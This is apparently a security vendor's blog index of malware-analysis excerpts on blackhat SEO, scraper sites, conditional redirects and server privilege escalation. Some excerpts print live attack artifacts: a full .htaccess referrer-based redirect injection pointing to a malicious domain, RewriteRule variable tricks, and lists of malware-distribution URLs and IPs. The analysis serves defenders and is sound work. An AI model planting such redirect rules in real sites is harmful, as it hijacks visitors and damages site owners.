Cloned Websites Stealing Google Rankings

We often speak of black hat SEO tactics and content scraping sites are just one example of such tactics. Scraping is the act of copying all content from a website using automated scripts, usually with the intention of stealing content or completely cloning the victim’s site. Lately we have been seeing quite a high number of clients affected by these so-called scraper sites. We’ll take a look at this kind of attack in an advanced form that results in the cloned site showing up in search results in place of the original site. These plagiarized sites abuse the way Google ranks content by sending fake organic traffic and by modifying internal backlinks on the cloned website so they no longer point to the victim’s website.

How Search Results Rank Website Content

Search engines want to return the best and most relevant pages in their search results to ensure that users have the best experience and find what they are looking for. As such, pages with the same or similar content on more than one page, or more than one site are not likely to rank high in the search results. One of the factors they take into consideration is the site’s organic traffic performance. This helps determine where that site should be ranked. In addition to many other factors, Google uses redirects to track which results the searcher clicks on within the search engine results page (SERP), and whether the searcher returns to click other results because they did not find what they were looking for.

As per study by Chitika in 2013:

Sites listed on the first Google search results page generate 92% of all traffic from an average search.

It makes sense that any kind of SEO targeting attack aims to get the best results they can within Google Search results can so that their activity can be successful and generate as much revenue as possible, or simply damage the SEO of the targeted website.


Read More

Hacked Websites Redirect to Porn from PDF / DOC Links

03292016_PornRedirect_v3

We write a lot about various blackhat SEO hacks on this blog and most of you are already familiar with such things as doorways, cloaking and SEO poisoning. This time we’ll tell you about yet another interesting blackhat SEO attack that we’ve been watching for the last year.

Let’s begin with symptoms:

Read More

.htaccess Tricks in Global.asa Files

htaccess_v1

As you might know a lot of hacks use Apache configuration .htaccess files to override default web site behavior: add conditional redirects, create virtual paths (e.g mod_rewrite), auto-append code to PHP scripts, etc.

In the world of IIS/ASP there is also an equivalent — Global.asa files. This file contains common declarations for all ASP scripts and should be placed in an ASP application root directory. If this file exists, ASP sessions include this file automatically.

Read More

Hacked Websites Redirect to Bitcoin

bitcoin

Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the BitCoin site, bitcoin.org. What’s going on? Is Bitcoin using black hat SEO? Is their site malicious?

Redirect to bitcoin.org

Redirect chain to bitcoin.org in Unmask Parasites results

As you can see, the hacked website doesn’t redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts a at raffic directing system (TDS). This piece analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and makes a decision as to what to do with the particular request. The TDS may have different routes for users from different countries or users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that can be very hard to exploit). A typical TDS would either return some HTTP error (e.g. 404 Page Not Found) or redirect unwanted traffic to some neutral third-party site. Most TDS are configured to dump unwanted traffic to google.com.
Read More

Website Malware – Curious .htaccess Conditional Redirect Case

I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

Website Malware - Curious HTACCESS Payload

The curious aspect about it is the use of a not-so-common .htaccess feature: variables. Most conditional injections rely only on the user agent (browser) or referrer of the visitor, but this one also leveraged the TIME_SEC and VWM variables:

RewriteRule .* - [E=cNL:%{TIME_SEC}]
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]


Read More

From a Site Compromise to Full Root Access – Symlinks to Root – Part I

When an attacker manages to compromise and get access to a website, they won’t likely stop there, they will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.

Read More

SiteCheck – Got Blackhat SEO Spam Warning?

As of late it seems like we’re talking about a lot of SPAM related cases, this post will be no different.

Blackhat SEO

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, making them difficult to detect and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.

Read More

Redirection Malware Very Good Leads to Fake AV

If you look at our Labs malware dump for the last few days, you will find something odd in the name of the top domains distributing malware:

712 redirections http://moi-verygoods.ru/simmetry?6
154 redirections http://moiverygoods.ru/simmetry?6
135 redirections http://webverygoods.ru/simmetry?6
131 redirections http://moiverygoods.ru/simmetry?6
88 redirections http://24-verygoods.ru/in.cgi?9


Read More

Sucuri SiteCheck – Web Malware Distribution – May 2012

Last month ( May 2012), we were able to identify 94,866 compromised (hacked) websites using our free SiteCheck scanner.

These were the top infections per distribution type (iframes and conditional redirections). A comparison to April can be seen here – Sucuri SiteCheck – Web Malware Distribution – April 2012):

You can more closely follow the daily activity in our labs by following Sucuri Labs and monitoring the Sucuri Labs page.

Conditional (often htaccess) redirections:

Read More

Malware Redirecting To Enormousw1illa.com

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (194.28.114.102).

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

enormousw1illa.com
infoitpoweringgathering.com
sweepstakesandcontestsdo.com
sweepstakesandcontestsnow.com
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.


If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net